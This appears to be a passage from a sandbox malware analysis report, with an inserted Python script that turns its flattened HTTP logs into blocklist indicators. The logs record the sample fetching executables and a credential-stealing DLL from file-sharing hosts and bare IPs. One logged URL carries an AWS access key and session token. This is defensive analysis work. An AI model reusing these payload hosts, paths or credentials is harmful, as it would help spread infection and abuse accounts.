Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 816F.exe, 0000001A.00000003.483869752.00000000060F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cnU
Source: 41479232570897308364731578.45.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: 41479232570897308364731578.45.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 453D.exe.1.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: 453D.exe.1.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: 453D.exe.1.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: 86EE.exe, 0000002D.00000003.488228184.00000000275BE000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
Source: 41479232570897308364731578.45.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 41479232570897308364731578.45.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/L
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
Source: 86EE.exe, 0000002D.00000003.488301104.00000000275CA000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.488058790.00000000273BD000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/chrome?p=update_error
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/chrome?p=update_errorFix
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/installer/?product=
Source: 86EE.exe, 0000002D.00000003.476668065.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.476668065.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.476529249.0000000001523000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/deadftx
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/deadftxhttps://www.tiktok.com/
Source: 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
Source: 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
Source: 86EE.exe, 0000002D.00000003.488228184.00000000275BE000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.489485701.00000000273BD000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/
Source: unknown DNS traffic detected: queries for: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
Source: global traffic HTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
Source: global traffic HTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
Source: global traffic HTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic HTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic HTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/c3cdbaee-85ac-4a48-be66-78ad66e33426/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJQ42XJV4&Signature=IUksA9vZLVbhefb7HnmbaZwnFpE%3D&x-amz-security-token=FwoGZXIvYXdzEGMaDFBfvdLs6HZ6MSBPiiK%2BAWALNPuMa6rSxHoop5qmIl2wbOjz7K7sH%2BK9q7FUpK6FzeYAa6wqhNo%2FqEszO%2B4lcaLIJqdHAQzH420%2Fct7mmuix1KE3VV7vsB4rlfrXJ%2Bx2D6O2pJRWriQDhr%2Bn%2Bj2qOVRnvilFa2z9fQCTTqBeUWhmFAgK0MmZwxAgR6DnLlikq9ZmDb%2Bfi3JvNdaDf%2FpilAEFpeKlwev59fRrV2UzPacglxt8Jkp6WYjDbHuxtVYVt1YFK5s292yvVVoUqIIox8LimwYyLdb%2BuxAdo55IMAGGklhd47631FcHjeYqUrSxnlpRpz5MqveHF3oBZfXTc5q71A%3D%3D&Expires=1668851791 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic HTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
Source: global traffic HTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /70o9ncI2y0/33069690-1668848800/RGEFSDAX.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-104.anonfiles.com
Source: global traffic HTTP traffic detected: GET /70o9ncI2y0 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic HTTP traffic detected: GET /6FpuHA HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: u.to
Source: global traffic HTTP traffic detected: GET /attachments/1031715664227995791/1043453543480303676/Original_Build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e3796f8cc611f4f1d7_654119648794384800
Source: global traffic HTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
Source: global traffic HTTP traffic detected: GET /1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 89.208.107.216
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic HTTP traffic detected: GET /659169136515.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic HTTP traffic detected: GET /785079514411.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
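The request lines above are printed by the sandbox with the request line and every header run together (no separator between "HTTP/1.1" and "Connection:", or between one header and the next), which makes them awkward to turn into indicators by hand. The Python below is an added example, not part of the Joe Sandbox report: it re-splits those flattened lines into request fields, collects the hosts and full URLs, and flags the traits worth noting in this section: payloads staged on legitimate file-sharing, CDN and messaging hosts (transfer.sh, anonfiles.com, cdn.discordapp.com, github.com, S3, t.me, u.to), bare-IP hosts serving .exe/.dll/.zip files, requests that carry no User-Agent at all, and the malformed User-Agent "Gecko / 20100101 Firefox / 107.0" on the t.me requests (spaces around the slashes, which no browser emits). The header-name list and the set of "abused legitimate hosts" are the editor's choices for this section, not values from the report; the sample lines are copied from the report above.

```python
import ipaddress
import re
from urllib.parse import unquote

# Request lines copied verbatim from the report section above.
SAMPLE_LINES = [
    "Source: global traffic HTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh",
    "Source: global traffic HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e3796f8cc611f4f1d7_654119648794384800",
    "Source: global traffic HTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168",
    "Source: global traffic HTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174",
    "Source: global traffic HTTP traffic detected: GET /659169136515.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache",
]

PREFIX = "Source: global traffic HTTP traffic detected: "
# Header names the sandbox emits in this section (editor's list); used to re-split the flattened header block.
HEADER_NAMES = ("Connection", "User-Agent", "Host", "Cookie", "Cache-Control")
HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in HEADER_NAMES))
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/(?P<version>1\.[01])")

# Legitimate services this sample uses for payload hosting or as a dead drop (editor's classification).
ABUSED_LEGIT_HOSTS = {
    "transfer.sh", "anonfiles.com", "cdn.discordapp.com", "github.com",
    "raw.githubusercontent.com", "t.me", "u.to",
}
PAYLOAD_EXTENSIONS = (".exe", ".dll", ".zip")


def parse_request_line(line):
    """Turn one flattened 'HTTP traffic detected' request line into a dict of request fields."""
    if not line.startswith(PREFIX):
        raise ValueError("not an HTTP request line from the report")
    body = line[len(PREFIX):]
    m = REQUEST_LINE.match(body)
    if not m:
        raise ValueError("no request line found")
    headers = {}
    # Zero-width split in front of every known header name restores the header boundaries.
    for chunk in HEADER_SPLIT.split(body[m.end():]):
        if chunk:
            name, _, value = chunk.partition(": ")
            headers[name] = value
    host = headers.get("Host", "")
    return {
        "method": m.group("method"),
        "target": m.group("target"),
        "path": unquote(m.group("target").split("?", 1)[0]),
        "host": host,
        "url": "http://%s%s" % (host, m.group("target")),
        "user_agent": headers.get("User-Agent", ""),
        "headers": headers,
    }


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_reasons(req):
    """Traits of one request that a triage analyst would flag (empty list if none)."""
    reasons = []
    host = req["host"]
    if _is_ip(host):
        reasons.append("bare-IP host")
    if host.endswith(".s3.amazonaws.com") or host in ABUSED_LEGIT_HOSTS:
        reasons.append("abused file-hosting/CDN/messaging host")
    if req["path"].lower().endswith(PAYLOAD_EXTENSIONS):
        reasons.append("downloads a PE/DLL/archive payload")
    ua = req["user_agent"]
    if not ua:
        reasons.append("no User-Agent header")
    elif " / " in ua:
        # "Gecko / 20100101 Firefox / 107.0": real browsers never put spaces around these slashes.
        reasons.append("malformed User-Agent")
    return reasons


def extract_iocs(lines):
    """Parse every request line, returning sorted unique hosts and URLs plus the flagged requests."""
    reqs = [parse_request_line(l) for l in lines if l.startswith(PREFIX)]
    flagged = []
    for r in reqs:
        why = suspicious_reasons(r)
        if why:
            flagged.append((r["url"], why))
    return {
        "hosts": sorted({r["host"] for r in reqs}),
        "urls": sorted({r["url"] for r in reqs}),
        "flagged": flagged,
    }


if __name__ == "__main__":
    for url, why in extract_iocs(SAMPLE_LINES)["flagged"]:
        print(url, "->", "; ".join(why))
```

The hosts and URLs it returns are the block-list candidates; the "abused legitimate host" reason is there so that transfer.sh, GitHub or Discord are handled as URL-level indicators rather than domain-level blocks.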
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:54 GMTServer: ApacheCache-Control: no-cache, privateUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:51 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 41 35 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 37Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e f8 91 ab fd b0 54 4a b3 dd 64 f8 f7 10 74 94 f2 83 Data Ascii: %S`Nh&WQY^TJdt
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 39Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e2 93 b4 fa b1 1d 4c ae 9e 28 fa f7 52 68 93 e3 84 e1 75 Data Ascii: %S`Nh&WQY^L(Rhu
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 43Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ba 86 bb fa a5 15 45 a9 c4 22 fa f4 53 33 85 a5 88 f1 36 f0 85 88 b9 Data Ascii: %S`Nh&WQY^E"S36
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:04 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 85Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e8 87 b6 b8 e7 4a 1b f2 d1 25 fa f4 1b 33 9d ef 95 ba 22 b1 8d df ac 35 85 47 bd aa 20 25 c6 77 1e 8d 1a 3e e4 95 c1 4a d5 b3 18 c6 c7 93 b1 6f f0 5d 64 a2 99 c1 cf c1 e2 19 96 6c f3 3f ec 8d a5 Data Ascii: %S`Nh&WQY^J%3"5G %w>Jo]dl?
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:04 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 104Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e9 8a ac f7 a3 19 42 b9 c4 65 fa e8 1a 75 96 e6 89 f6 20 b2 8c 99 b2 7e b5 42 92 a3 47 69 cf 77 50 9a 4e 68 bf d6 96 5c d0 b0 1c df 95 c4 f3 35 a4 04 37 fe c5 ba ee e2 d0 30 a8 42 df 75 fa 80 b0 6c 04 70 0b 41 ca 42 87 51 52 ae 61 c1 11 9e 12 a8 4c 50 Data Ascii: %S`Nh&WQY^Beu ~BGiwPNh\570BulpABQRaLP
